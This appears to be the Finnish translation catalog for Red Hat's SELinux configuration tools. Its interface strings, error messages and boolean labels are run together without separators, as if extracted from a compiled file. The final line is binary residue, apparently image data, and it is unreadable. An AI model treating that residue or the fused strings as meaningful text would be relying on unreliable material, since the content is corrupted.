Käytäntösäilöä ei voida lukea.Vaihda prosessin tila toimeenpanevaksi.Vaihda prosessin tila sallivaksi.Käytäntötyypin vaihtaminen aiheuttaa seuraavan käynnistyksen yhteydessä koko tiedostojärjestelmän nimiöinnin uudelleen. Se saattaa viedä kauan aikaa riippuen tiedostojärjestelmän koosta. Haluatko jatkaa?SELinuxin poistaminen käytöstä ei ole suositeltua ja vaatii järjestelmän käynnistämisen uudelleen. Jos kytket myöhemmin SELinuxin takaisin käyttöön, järjestelmä on nimiöitävä uudelleen. Jos haluat vain tarkistaa aiheuttaako SELinux ongelmia järjestelmässä, voit siirtyä sallivaan tilaan, joka vain kirjoittaa virheistä lokitietoja eikä toimeenpane SELinux-käytäntöä. Sallivaan tilaan siirtyminen ei vaadi järjestelmän käynnistämistä uudelleen. Haluatko jatkaa?SELinuxin ottaminen käyttöön aiheuttaa seuraavan käynnistyksen yhteydessä koko tiedostojärjestelmän nimiöinnin uudelleen. Se saattaa viedä kauan aikaa riippuen tiedostojärjestelmän koosta. Haluatko jatkaa?YhteensopivuusTee SELinux-asetuksetKontekstiTekijänoikeudet (c) 2006 Red Hat, Inc.
Tekijänoikeudet (c) 2006 Dan Walsh <dwalsh@redhat.com>Ei voitu lisätä SELinux-käyttäjää %sEi voitu lisätä osoitetta %sEi voitu lisätä tiedostokontekstia kohteelle %sEi voitu lisätä verkkoliitäntää %sKäyttäjälle %s ei voitu lisätä kirjautumisassosiaatiotaEi voitu lisätä porttia %s/%sEtuliitettä %s ei voitu lisätä käyttäjälle %sRoolia %s ei voitu lisätä käyttäjälle %sEi voitu tarkistaa onko SELinux-käyttäjää %s määriteltyEi voitu tarkistaa onko osoite %s määriteltyEi voitu tarkistaa onko totuusarvo %s määriteltyEi voitu tarkistaa onko tiedostokonteksti määritelty kohteelle %sEi voitu tarkistaa onko verkkoliitäntä %s määriteltyEi voitu tarkistaa onko käyttäjälle %s määritelty kirjautumisassosiaatiotaEi voitu tarkistaa onko portti %s/%s määriteltyKuvaajia ei voitu sulkea.
Semanage-transaktiota ei voitu toteuttaaEi voitu luoda SELinux-käyttäjää käyttäjälle %sEi voitu luoda avainta käyttäjälle %sEi voitu luoda avainta yhdistelmälle %s/%sEi voitu luoda osoitetta kohteelle %sEi voitu luoda kontekstia osoitteelle %sYhdistelmälle %s/%s ei voitu luoda kontekstiaEi voitu luoda tiedostokontekstia kohteelle %sEi voitu luoda verkkoliitäntää kohteelle %sEi voitu luoda avainta osoitteelle %sKäyttäjälle %s ei voitu tehdä kirjautumisassosiaatiotaYhdistelmälle %s/%s ei voitu luoda porttiaEi voitu luoda semanage-kahvaaEi voitu poistaa SELinux-käyttäjää %sEi voitu poistaa osoitetta %sEi voitu poistaa totuusarvoa %sEi voitu poistaa kohteen %s tiedostokontekstiaEi voitu poistaa verkkoliitäntää %sKäyttäjän %s kirjautumisassosiaatiota ei voitu poistaaEi voitu poistaa porttia %s/%sEi voitu poistaa kohteen %s tiedostokontekstiaEi voitu poistaa porttia %sEi voitu selvittää toimeenpanevaa tilaa.
Semanage-yhteyttä ei voitu muodostaaEi voitu purkaa käyttäjän %s avaintaSELinux-moduuleita ei voitu luetteloidaSELinux-käyttäjiä ei voitu luetteloidaEi voitu luetteloida osoitteitaEi voitu luetteloida totuusarvojaEi voitu luetella tiedostokontekstejaEi voitu luetella verkkoliitäntöjäEi voitu luetella paikallisia tiedostokontekstejaKirjautumisassosiaatioita ei voitu luetteloidaEi voitu luetteloida porttejaKäyttäjän %s rooleja ei voitu luetteloidaEi voitu luetella tiedostokontekstejaEi voitu luetteloida porttejaEi voitu muokata SELinux-käyttäjää %sEi voitu muokata osoitetta %sEi voitu muokata totuusarvoa %sEi voitu muokata kohteen %s tiedostokontekstiaEi voitu muokata verkkoliitäntää %sKäyttäjän %s kirjautumisassosiaatiota ei voitu muokataEi voitu muokata porttia %s/%sTiedostoa %s ei voitu avata
Ei voitu kysellä osoitetta %sEi voitu kysellä tiedostokontekstia kohteelle %sEi voitu kysellä tiedostokontekstia kohteelle %sEi voitu kysellä verkkoliitäntää %sEi voitu kysellä porttia %s/%sSeuserilta ei voitu kysellä käyttäjän %s tietojaEi voitu kysellä käyttäjältä tietoja kohteesta %sEi voitu poistaa sallivaa toimialuetta %s (poisto epäonnistui)Käyttäjän %s MLS-tasoa ei voitu asettaaKäyttäjän %s MLS-aluetta ei voitu asettaaKäyttäjän %s SELinux-käyttäjää ei voitu asettaaEi voitu asettaa totuusarvon %s aktiivista arvoaEi voitu asettaa osoitekontekstia kohteelle %sEi voitu asettaa suorituskontekstia kontekstiksi %s.
Ei voitu asettaa tiedostokontekstia kohteelle %sEi voitu asettaa verkkoliitäntäkontekstia kohteelle %sEi voitu asettaa peitettä osoitteelle %sEi voitu asettaa viestikontekstia kohteelle %sEi voitu asettaa mls-kenttiä osoitekontekstissa kohteelle %sEi voitu asettaa mls-kenttiä tiedostokontekstissa kohteelle %sEi voitu asettaa mls-kenttiä verkkoliitäntäkontekstissa kohteelle %sEi voitu asettaa mls-kenttiä yhdistelmän %s/%s porttikontekstissaKäyttäjän %s nimeä ei voitu asettaaEi voitu asettaa sallivaa toimialuetta %s (moduulin asennus epäonnistui)Ei voitu asettaa porttikontekstia yhdistelmälle %s/%sEi voitu asettaa roolia osoitekontekstissa kohteelle %sEi voitu asettaa roolia tiedostokontekstissa kohteelle %sEi voitu asettaa roolia verkkoliitäntäkontekstissa kohteelle %sEi voitu asettaa roolia yhdistelmän %s/%s porttikontekstissaEi voitu asettaa tyyppiä osoitekontekstissa kohteelle %sEi voitu asettaa tyyppiä tiedostokontekstissa kohteelle %sEi voitu asettaa tyyppiä verkkoliitäntäkontekstissa kohteelle %sEi voitu asettaa tyyppiä yhdistelmän %s/%s porttikontekstissaEi voitu asettaa käyttäjää osoitekontekstissa kohteelle %sEi voitu asettaa käyttäjää tiedostokontekstissa kohteelle %sEi voitu asettaa käyttäjää verkkoliitäntäkontekstissa kohteelle %sEi voitu asettaa käyttäjää yhdistelmän %s/%s porttikontekstissaSemanage-transaktiota ei voitu käynnistääEi voitu testata onko MLS käytössäEi voitu hakea oletustyyppiä.
Luo tai muuttaa väliaikaisia tiedostoja /tmp-hakemistossaCronNykyinen toimeenpaneva tilaMukautettuDBUS-järjestelmätaustaprosessiTietokannatPoista %sPoista tiedostokontekstiPoista verkkoporttiPoista SELinux-käyttäjäassosiaatioPoista käyttäjäKuvausPoista Audit käytöstäPoista SELinux-suojaus Cluster ServeriltäPoista SELinux-suojaus EvolutioniltaPoista SELinux-suojaus Hal-taustaprosessiltaPoista SELinux-suojaus NIS Password -taustaprosessiltaPoista SELinux-suojaus NIS Transfer -taustaprosessiltaPoista SELinux-suojaus NetworkManageriltaPoista SELinux-suojaus ThunderbirdiltäPoista SELinux-suojaus acct-taustaprosessiltaPoista SELinux-suojaus amandaltaPoista SELinux-suojaus amavisiltaPoista SELinux-suojaus apmd-taustaprosessiltaPoista SELinux-suojaus arpwatch-taustaprosessiltaPoista SELinux-suojaus auditd-taustaprosessiltaPoista SELinux-suojaus automount-taustaprosessiltaPoista SELinux-suojaus avahiltaPoista SELinux-suojaus bluetooth-taustaprosessiltaPoista SELinux-suojaus canna-taustaprosessiltaPoista SELinux-suojaus cardmgr-taustaprosessiltaPoista SELinux-suojaus ciped-taustaprosessiltaPoista SELinux-suojaus clamd-taustaprosessiltaPoista SELinux-suojaus clamscan-taustaprosessiltaPoista SELinux-suojaus clvmd-taustaprosessiltaPoista SELinux-suojaus comscat-taustaprosessiltaPoista SELinux-suojaus courier-taustaprosessiltaPoista SELinux-suojaus cpucontrol-taustaprosessiltaPoista SELinux-suojaus cpuspeed-taustaprosessiltaPoista SELinux-suojaus crond-taustaprosessiltaPoista SELinux-suojaus cups hplip -taustaprosessiltaPoista SELinux-suojaus cupsd-taustapalvelimeltaPoista SELinux-suojaus cupsd-taustaprosessiltaPoista SELinux-suojaus cupsd_lpd:ltäPoista SELinux-suojaus cvs-taustaprosessiltaPoista SELinux-suojaus cyrus-taustaprosessiltaPoista SELinux-suojaus dskkd-taustaprosessiltaPoista SELinux-suojaus dbusd-taustaprosessiltaPoista SELinux-suojaus dccd-taustaprosessiltaPoista SELinux-suojaus dccifd:ltäPoista SELinux-suojaus dccm:ltäPoista SELinux-suojaus ddt-taustaprosessiltaPoista SELinux-suojaus devfsd-taustaprosessiltaPoista SELinux-suojaus dhcpc-taustaprosessiltaPoista SELinux-suojaus dhcpd-taustaprosessiltaPoista SELinux-suojaus dictd-taustaprosessiltaPoista SELinux-suojaus distccd-taustaprosessiltaPoista SELinux-suojaus dmesg-taustaprosessiltaPoista SELinux-suojaus dnsmasq-taustaprosessiltaPoista SELinux-suojaus dovecot-taustaprosessiltaPoista SELinux-suojaus entropyd-taustaprosessiltaPoista SELinux-suojaus fetchmaililtaPoista SELinux-suojaus fingerd-taustaprosessiltaPoista SELinux-suojaus freshclam-taustaprosessiltaPoista SELinux-suojaus fsdaemon-taustaprosessiltaPoista SELinux-suojaus peleiltäPoista SELinux-suojaus gpm-taustaprosessiltaPoista SELinux-suojaus gss-taustaprosessiltaPoista SELinux-suojaus hostname-taustaprosessiltaPoista SELinux-suojaus hotplug-taustaprosessiltaPoista SELinux-suojaus howl-taustaprosessiltaPoista SELinux-suojaus http:n suexeciltäPoista SELinux-suojaus httpd:n rotatelogsiltaPoista SELinux-suojaus hwclock-taustaprosessiltaPoista SELinux-suojaus i18n-taustaprosessiltaPoista SELinux-suojaus imazesrv-taustaprosessiltaPoista SELinux-suojaus inetd-lapsitaustaprosesseiltaPoista SELinux-suojaus inetd-taustaprosessiltaPoista SELinux-suojaus innd-taustaprosessiltaPoista SELinux-suojaus iptables-taustaprosessiltaPoista SELinux-suojaus ircd-taustaprosessiltaPoista SELinux-suojaus irqbalance-taustaprosessiltaPoista SELinux-suojaus iscsi-taustaprosessiltaPoista SELinux-suojaus jabberd-taustaprosessiltaPoista SELinux-suojaus kadmind-taustaprosessiltaPoista SELinux-suojaus klogd-taustaprosessiltaPoista SELinux-suojaus krb5kdc-taustaprosessiltaPoista SELinux-suojaus ktalk-taustaprosessiltaPoista SELinux-suojaus kudzu-taustaprosessiltaPoista SELinux-suojaus locate-taustaprosessiltaPoista SELinux-suojaus lpd-taustaprosessiltaPoista SELinux-suojaus lrrd-taustaprosessiltaPoista SELinux-suojaus lvm-taustaprosessiltaPoista SELinux-suojaus mailman-taustaprosessiltaPoista SELinux-suojaus mdadm-taustaprosessiltaPoista SELinux-suojaus monopd-taustaprosessiltaPoista SELinux-suojaus mrtg-taustaprosessiltaPoista SELinux-suojaus mysqld-taustaprosessiltaPoista SELinux-suojaus nagios-taustaprosessiltaPoista SELinux-suojaus named-taustaprosessiltaPoista SELinux-suojaus nessusd-taustaprosessiltaPoista SELinux-suojaus nfsd-taustaprosessiltaPoista SELinux-suojaus nmbd-taustaprosessiltaPoista SELinux-suojaus nrpe-taustaprosessiltaPoista SELinux-suojaus nscd-taustaprosessiltaPoista SELinux-suojaus nsd-taustaprosessiltaPoista SELinux-suojaus ntpd-taustaprosessiltaPoista SELinux-suojaus oddjob-taustaprosessiltaPoista SELinux-suojaus oddjob_mkhomedir:iltäPoista SELinux-suojaus openvpn-taustaprosessiltaPoista SELinux-suojaus pam-taustaprosessiltaPoista SELinux-suojaus pegasukseltaPoista SELinux-suojaus perdition-taustaprosessiltaPoista SELinux-suojaus portmap-taustaprosessiltaPoista SELinux-suojaus portslave-taustaprosessiltaPoista SELinux-suojaus postfixiltaPoista SELinux-suojaus postgresql-taustaprosessiltaPoista SELinux-suojaus pptp:ltäPoista SELinux-suojaus prelink-taustaprosessiltaPoista SELinux-suojaus privoxy-taustaprosessiltaPoista SELinux-suojaus ptal-taustaprosessiltaPoista SELinux-suojaus pxe-taustaprosessiltaPoista SELinux-suojaus pyzord-taustaprosessiltaPoista SELinux-suojaus quota-taustaprosessiltaPoista SELinux-suojaus radiusd-taustaprosessiltaPoista SELinux-suojaus radvd-taustaprosessiltaPoista SELinux-suojaus rdisciltäPoista SELinux-suojaus readaheadiltaPoista SELinux-suojaus restorecondiltaPoista SELinux-suojaus rhgb-taustaprosessiltaPoista SELinux-suojaus ricciltäPoista SELinux-suojaus ricci_modclusterd:ltäPoista SELinux-suojaus rlogind-taustaprosessiltaPoista SELinux-suojaus rpcd-taustaprosessiltaPoista SELinux-suojaus rshd-taustaprosessiltaPoista SELinux-suojaus rsync-taustaprosessiltaPoista SELinux-suojaus saslauthd-taustaprosessiltaPoista SELinux-suojaus scannerdaemon-taustaprosessiltaPoista SELinux-suojaus sendmail-taustaprosessiltaPoista SELinux-suojaus setransiltaPoista SELinux-suojaus setroubleshoot-taustaprosessiltaPoista SELinux-suojaus slapd-taustaprosessiltaPoista SELinux-suojaus slrnpull-taustaprosessiltaPoista SELinux-suojaus smbd-taustaprosessiltaPoista SELinux-suojaus snmpd-taustaprosessiltaPoista SELinux-suojaus snort-taustaprosessiltaPoista SELinux-suojaus soundd-taustaprosessiltaPoista SELinux-suojaus soundd-taustaprosessiltaPoista SELinux-suojaus spamd-taustaprosessiltaPoista SELinux-suojaus speedmgmt-taustaprosessiltaPoista SELinux-suojaus squid-taustaprosessiltaPoista SELinux-suojaus ssh-taustaprosessiltaPoista SELinux-suojaus stunnel-taustaprosessiltaPoista SELinux-suojaus swat-taustaprosessiltaPoista SELinux-suojaus sxid-taustaprosessiltaPoista SELinux-suojaus syslogd-taustaprosessiltaPoista SELinux-suojaus järjestelmän cron-töiltäPoista SELinux-suojaus tcp-taustaprosessiltaPoista SELinux-suojaus telnet-taustaprosessiltaPoista SELinux-suojaus tftpd-taustaprosessiltaPoista SELinux-suojaus verkkoselaimiltaPoista SELinux-suojaus transproxy-taustaprosessiltaPoista SELinux-suojaus udev-taustaprosessiltaPoista SELinux-suojaus uml-taustaprosessiltaPoista SELinux-suojaus updfstab-taustaprosessiltaPoista SELinux-suojaus uptimed-taustaprosessiltaPoista SELinux-suojaus uucpd-taustaprosessiltaPoista SELinux-suojaus vmware-taustaprosessiltaPoista SELinux-suojaus watchdog-taustaprosessiltaPoista SELinux-suojaus winbind-taustaprosessiltaPoista SELinux-suojaus xdm-taustaprosessiltaPoista SELinux-suojaus xen-hallinnaltaPoista SELinux-suojaus xen-taustaprosessiltaPoista SELinux-suojaus xfs-taustaprosessiltaPoista SELinux-suojaus ypbind-taustaprosessiltaPoista SELinux-suojaus ypserv-taustaprosessiltaEi käytössäEi käytössä
Salliva
Toimeenpaneva
Älä salli prosessien ladata ytimen moduuleitaÄlä salli prosessien muokata ytimen SELinux-käytäntöäÄlä salli siirtymistä sysadm_t:hen, vaikuttaa sudoon ja su:hunÄlä auditoi asioita, joiden tiedetään olevan rikki, mutta jotka eivät ole turvallisuusriskejäMuokkaa verkkoporttiaOta Audit käyttöönOta käyttöön/poista käytöstä auditin lisäsäännöt, joita ei yleensä raportoida lokitiedostoissa.ToimeenpanevaSyötä rajoitettavan suoritettavan tiedoston täysi polkuSyötä rajoitetun ohjelman käynnistämiseen käytettävän komentosarjan täysi polku.Syötä uniikki nimi rajoitetulle ohjelmalle tai käyttäjäroolilleVirhe muistivarauksessa.
Komentotulkin argv0:n varaamisessa tapahtui virhe.
Virhe käyttäjätunnuksen vaihdossa, lopetetaan.
Virhe audit-järjestelmään yhdistämisessä.
Virhe SETUID-ominaisuuden hylkäämisessä, lopetetaan
Virhe ominaisuuksien hylkäämisessä, lopetetaan
Virhe ominaisuuksien vapauttamisessa
Virhe ominaisuuksien alustamisessa, lopetetaan.
Virhe KEEPCAPSin uudelleenasetuksessa, lopetetaan.
Virhe audit-viestin lähettämisessä.
Virhe asettaessa KEEPCAPSia, lopetetaan.
Virhe ominaisuuksien asettamisessa, lopetetaan.
Virhe! Ei voitu avata tty:tä %s.
Virhe! Komentotulkki on virheellinen.
Virhe: annettiin useita tasoja
Virhe: annettiin useita rooleja
Virhe: annettiin useita tyyppejä
Virhe: tasoa ei voi vaihtaa turvattomassa päätteessä
Suoritettava tiedostoOlemassa olevat käyttäjäroolitOlemassa_oleva_käyttäjäTty:n sulkeminen kunnolla epäonnistui
Tiedosto-
määrittelyTiedosto-
tyyppiTiedostokontekstitiedostoTiedostonimiöintiTiedostomäärittelyTiedostotyyppiKohteen %s tiedostokonteksti on määritelty SELinux-käytännössä, sitä ei voi poistaaTiedostokonteksti ei ole määritelty kohteelle %sSuodinGPLPelitGeneroi uusi käytäntömoduuliRyhmänäkymäHTTPD-palveluInit-komentosarjaToimii päätteen kanssaVerkkoliitäntä %s on määritelty SELinux-käytännössä, sitä ei voi poistaaVerkkoliitäntää %s ei ole määriteltyVerkkoliitäntätiedostoInternet-palvelut (intetd)Internet-palvelut ovat xinetd:n käynnistämiä taustaprosessejaVirheellinen tiedostomääritysKerberosNimiöintiLinux-ryhmää %s ei ole olemassaLinux-käyttäjää %s ei ole olemassaLuettelonäkymäLataa käytäntömoduuliLataa käytäntömoduuliRajoitus...Kirjautumis-
nimiVaaditaan kirjautuminen ”%s”KirjautumisnimiKäyttäjän %s kirjautumisassosiaatio on määritelty SELinux-käytännössä, sitä ei voi poistaaKäyttäjälle %s ei ole määritelty kirjautumisassosiaatiotaMCS-tasoMCS-alueMLSMLS/MLS/
MCS-alueMLS/MCS-
tasoMLS/MCS-alueMuistin suojausMinimaalisen päätekäyttäjän rooliMinimaalisen X Windows -käyttäjän rooliMuokkaa kohdetta %sMuuta tiedostokontekstiaMuokkaa SELinux-käyttäjäassosiaatiotaMuokkaa käyttäjääMuokkaa olemassa olevan kirjautuvan käyttäjän tietoja.Moduuli %s.pp on jo ladattu nykyisessä käytännössä.
Haluatko jatkaa?Moduulin nimiMountNFSNISNimiNimipalveluVerkkoasetuksetVerkkoporttiTiedostolla %s ei ole kontekstia
Koneen osoite on pakollinenKoneen aliverkon peite on pakollinenEi vielä toteutettuValitsinvirhe %sMuisti loppui!
Salasana:SallivaPolgenKäytäntöhakemistoKäytäntömoduuliPorttiPortti %s/%s on jo määriteltyPortti %s/%s on määritelty SELinux-käytännössä, sitä ei voi poistaaPorttia %s/%s ei ole määriteltyPorttinumeroPortti on pakollinenPorttinumero ”%s” on virheellinen. 0 < PORTTINUMERO < 65536Porttien on oltava numeroita tai numeroalueita väliltä 1-%dEtuliiteTulostusProsessin toimialueProtokollaProtokollaUdp- tai tcp-protokolla on pakollinenRed Hat 2007Nimiöi tiedostojärjestelmä uudelleen seuraavan käynnistyksen yhteydessä.Poista ladattava käytäntömoduuliVaaditaan ainakin yksi kategoriaVaatii etuliitteen tai roolitVaatii etuliitteen, roolit, tasot tai alueenVaatii setypenVaatii setypen tai serangenVaatii setypen, serangen tai seuserinVaatii seuserin tai serangenPalauta totuusarvo järjestelmän oletusasetuksiinRooliPääkäyttäjän ylläpitorooliSuorita ohjattu totuusarvojen rajoitusSASL-tunnistautumispalvelinSELinux-
käyttäjäSELinuxin ylläpitoSELinux-verkkoliitäntäSELinux-käytäntöjen generointityökaluSELinux-portti
tyyppiSELinux-porttityyppiSELinux-roolitSELinux-palvelusuojausSELinux-tyyppiSELinux-tyyppi on pakollinenSELinux-käyttäjäSELinux-totuusarvoSELinux-tiedostokontekstiSELinux-käytäntöä ei hallita tai säilöä ei voida käyttää.SELinux-käyttäjä %s on määritelty SELinux-käytännössä, sitä ei voi poistaaSELinux-käyttäjää %s ei ole määriteltySELinux-käyttäjä ”%s” on pakollinenSSHSambaValitse hallintaobjektiValitse portitValitse pääkäyttäjän ylläpitorooli, jos tämä käyttäjä ylläpitää konetta pääkäyttäjänä (root). Tämä käyttäjä ei pysty kirjautumaan järjestelmään suoraan.Valitse hakemisto, jonne käytäntötiedostot generoidaanValitse hakemistot, jotka rajoitettava ohjelma omistaa tai joihin se kirjoittaaValitse rajoitettava suoritettava tiedosto.Valitse tiedostot, joita rajoitettava ohjelma luo tai joihin se kirjoittaaValitse haluatko nimiöidä koko tiedostojärjestelmän uudelleen seuraavan käynnistyksen yhteydessä. Se saattaa viedä kauan aikaa riippuen tiedostojärjestelmän koosta. Jos olet vaihtamassa käytäntötyyppiä tai ottamassa SELinuxia käyttöön toimeenpanevassa tilassa, uudelleennimiöinti on pakollista.Valitse rajoitettava init-komentosarja.Valitse toimialueet, joita haluat tämän käyttäjän ylläpitävän.Valitse käyttäjäroolit, jotka siirtyvät tämän ohjelman toimialueelle.Selinux-
tiedostotyyppiSemanage-transaktio on jo käynnissäSemanage-transaktio ei ole käynnissäLähettää audit-viestejäLähettää sähköpostiaAsetuskomentosarjaValitsinta -l voi käyttää vain SELinuxin MLS-tuen kanssa.
newrolea voi käyttää vain SELinux-kernelillä.
run_initiä voi käyttää vain SELinux-kernelillä.
RoskapostisuojausSquidOletus-init-taustaprosessitOletus-init-taustaprosessit ovat init-komentosarjojen käynnistyksen yhteydessä käynnistämiä prosesseja. Ne yleensä tarvitsevat hakemistossa /etc/rc.d/init.d olevan komentosarjanTilaJärjestelmän toimeenpaneva tila oletuksenaJärjestelmän oletuskäytännön tyyppi:Tämä käyttäjä voi kirjautua koneelle X:n tai päätteen kautta. Oletuksena tällä käyttäjällä ei ole setuid-oikeutta, verkkoa, su:ta tai sudoa.Tämä käyttäjä kirjautuu koneelle vain päätteen kautta tai etäkirjautumalla. Oletuksena tällä käyttäjällä ei ole setuid-oikeutta, verkkoa, su:ta tai sudoa.Tämän käytäntöpakkauksen aktivoimiseksi suorita:Vaihda muokattujen ja kaikkien totuusarvojen välilläVaihda muokattujen ja kaikkien porttien välilläVaihda kaikkien ja muokattujen tiedostokontekstien välilläSiirrä staff-SELinux-käyttäjä verkkoselaimen toimialueelleSiirrä sysadm-SELinux-käyttäjä verkkoselaimen toimialueelleSiirrä user-SELinux-käyttäjä verkkoselaimen toimialueelleSiirrä xguest-SELinux-käyttäjä verkkoselaimen toimialueelleTyyppi %s_t on jo määritelty nykyisessä käytännössä.
Haluatko jatkaa?TyyppitoimeenpanotiedostoTyyppi on pakollinenKäyttö: run_init <komentosarja> <argumentit ...>
  missä: <komentosarja> on suoritettavan käynnistyskomentosarjan nimi,
         <argumentit ...> ovat sen argumentit.USER-tyypit saavat automaattisesti tmp-tyypinnew_contextille ei voida varata muistiaYmpäristöä ei voida siivota
Tyhjän signaalijoukon hankkiminen epäonnistui
Ei voitu palauttaa ympäristöä, lopetetaan
Tty:n nimiötä ei voitu palauttaa…
SIGHUP-käsittelimen asetus epäonnistui
Yleinen SSL-tunneliTuntematon tai puuttuva protokollaVaraamattomat portit (>1024)Käyttö %s -LKäyttö %s -L -l käyttäjäKäyttö %s -d Tiedosto ...Käyttö %s -l -d käyttäjä ...Käyttö %s -l KATEGORIA käyttäjä ...Käyttö %s -l [[+|-]KATEGORIA],...]q käyttäjä ...Käyttö %s KATEGORIA Tiedosto ...Käyttö %s [[+|-]KATEGORIA],...]q Tiedosto ...Käytä -- valitsinluettelon lopettamiseksi. EsimerkiksiKäyttäjän ohjelmiaKäyttäjän ohjelma on mikä tahansa käyttäjän käynnistämä ohjelma, jonka toimintaa halutaan rajoittaaKäyttäjäassosiaatioKäyttäjien oikeudetKäyttäjän rooliKäyttäjät joilla on täysi verkonkäyttömahdollisuus, ei setuid-oikeuksia ilman siirtymistä, ei su:ta, voi siirtyä sudolla Pääkäyttäjän ylläpitorooliinKäyttäjä jolla on täysi verkonkäyttömahdollisuus, ei setuid-oikeuksia ilman siirtymistä, ei sudoa eikä su:ta.Käyttää Pamia tunnistautumiseenKäyttää dbusiaKäyttää nsswitchiä tai getpw*-kutsujaTarkista nimiVersioVaroitus! Ei voitu hakea tty-tietoja.
Varoitus! Ei voitu palauttaa tty:n %s kontekstia
Web-sovellus tai -komentosarja (CGI)Web-ohjelmatWeb-sovellukset tai -komentosarjat ovat web-palvelimen (apache) käynnistämiä CGI-komentosarjojaKirjoittaa viestejä järjestelmälokiinXENX-palvelinAinakin yksi rooli on lisättävä käyttäjälle %sSuoritettava tiedosto on annettavaRajoitetulle prosessille tai käyttäjälle on annettava nimiRajoitetulle prosessille on annettava suoritettavan tiedoston polkuKäyttäjä on valittavaYksi seuraavista arvoista on määriteltävä: %s_Poista_Ominaisuudetkaikkikaikki tiedostot
tavallinen tiedosto
hakemisto
merkkilaite
lohkolaite
pistoke
symbolinen linkki
nimetty putki
tunnistautuminen epäonnistui.
passwd-tiedostosta ei löydy kelvollista kohtaa.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential juservirhe luettaessa PAM-palveluasetuksia.
uuden alueen tekeminen tasolle %s epäonnistui
uuden kontekstin muuntaminen merkkijonoksi epäonnistui
komentotulkin suorittaminen epäonnistui
kirjautumistietoja ei saatu
uuden kontekstin hakeminen epäonnistui.
old_contextin hakeminen epäonnistui.
PAMin alustaminen epäonnistui
PAM_TTY:n asettaminen epäonnistui
uuden alueen %s asettaminen epäonnistui
uuden roolin %s asettaminen epäonnistui
uuden tyypin %s asettaminen epäonnistui
getpass ei voi avata laitetta /dev/tty
globaalilabel37label38label39label41label42label44label50label59newrole: %s: virhe rivillä %lu.
newrole: haarautuminen epäonnistui: %snewrole: virheellinen salasana käyttäjälle %s
newrole: palveluiden nimiasetusten hajautustaulun ylivuoto
epätositosipppdrsyncrun_init: väärä salasana käyttäjälle %s
system-config-selinuxVille-Pekka Vainio <vpivaini@cs.helsinki.fi>, 2009tyyppituntematonkäyttö:  %s [-qi]
use_syslog:n on oltava totuusarvo
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`